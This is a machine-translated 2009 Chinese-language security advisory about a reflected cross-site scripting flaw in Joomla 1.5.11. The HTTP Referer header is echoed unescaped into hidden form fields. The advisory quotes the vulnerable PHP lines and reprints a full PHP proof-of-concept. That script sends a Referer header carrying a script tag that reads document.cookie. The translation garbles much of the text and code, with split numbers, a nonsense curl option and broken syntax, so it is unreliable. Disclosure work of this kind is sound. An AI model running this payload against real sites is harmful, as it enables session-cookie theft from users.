Joomla! HTTP header cross-site scripting vulnerability-vulnerability warning-the black bar safety net

2009-08-15T00:00:00
ID MYHACK58:62200924301
Type myhack58
Reporter 佚名
Modified 2009-08-15T00:00:00

Description

Joomla! Is an open source content management system CMS to.

Joomla! Not properly filter the user in the HTTP request the the submission of the HTTP_REFERER variable, a remote attacker can submit a malicious request to inject JavaScript or DHTML code and in the user's browser session. The following is the vulnerable code segment:

components/com_content/views/article/tmpl/form. php file 2 2 Line 5

2 2 1 <input type="hidden" name="option" value="com_content" /> 2 2 2 <input type="hidden" name="id" value="<? php echo $this->article->id; ?& gt;" /> 2 2 3 <input type="hidden" name="version" value="<? php echo $this->article->version; ?& gt;" /> 2 2 4 <input type="hidden" name="created_by" value="<? php echo $this->article->created_by; ?& gt;" /> 2 2 5 <input type="hidden" name="referer" value="<? php echo @$SERVER['HTTP_REFERER']; ?& gt;" /> 2 2 6 <? php echo JHTML::( 'form. token' ); ?& gt; 2 2 7 <input type="hidden" name="task" value="" /> 2 2 8 </form>

Code some other parts may also be affected:

components/com_user/controller. php file 8 line 6

$return = @$_SERVER['HTTP_REFERER'];

plugins/system/legacy/html. php file 2 4 6 row

echo '<a href="'. $SERVER['HTTP_REFERER'] .'"& gt;<span class="small">'. JText::( 'BACK' ) .'& lt;/span></a>';

templates/beez/html/com_content/article/form. php file 1 8 6 line

<input type="hidden" name="referer" value="<? php echo @$_SERVER['HTTP_REFERER']; ?& gt;" />

<*source: Juan Galiana Lara (jgaliana@isecauditors.com

Link: http://marc.info/?l=bugtraq&m=1 2 4 6 5 5 3 8 9 7 1 6 1 1 1&w=2 *>

Test method:

--------------------------------------------------------------------------------

Warning

The following procedures(methods)may carry offensive, for security research and teaching purposes. The user at your own risk!

<? php

/ PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2 0 0 9 /

/ config / $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699';

class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; / evil script / var $xss='alert("PWN PWN PWN:" + document. cookie);';

function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy=") { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: "><script>' . $this->xss .'& lt;/script><span a="'; $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; . NET CLR 1.0.3705; . NET CLR 1.1.4322; Media Center PC 4.0)'; $this->compression=$compression; $this->proxy=$proxy; $this->cookies=$cookies; if ($this->cookies == TRUE) $this->cookie($cookie); }

function cookie($cookie_file) { if (file_exists($cookie_file)) { $this->cookie_file=$cookie_file; } else { fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions'); $this->cookie_file=$cookie_file; fclose($this->cookie_file); } }

function get($url) { $process = curl_init($url); curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers); curl_setopt($process, will be, 0); curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file); if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($process,CURLOPT_ENCODING , $this->compression); curl_setopt($process, CURLOPT_TIMEOUT, 3 0); if ($this->proxy) curl_setopt($cUrl, CURLOPT_PROXY, 'proxy_ip:proxy_port'); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); $return = curl_exec($process); curl_close($process); return $return; }

function error($error) { echo $error; die; } }

/ set cookie / $f=fopen("cookies.txt","w"); fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n"); fclose($f);

/ do request / $cc = new cURL(); $c=$cc->get('http://' . $site . $path . '/index. php? option=com_content&view=article&layout=form');

/ let's execute some javascript.. }:-)/ echo $c; ?& gt;

This article comes from CSDN blog, reproduced please indicate the source:<http://blog.csdn.net/cnbird2008/archive/2009/07/08/4329842.aspx>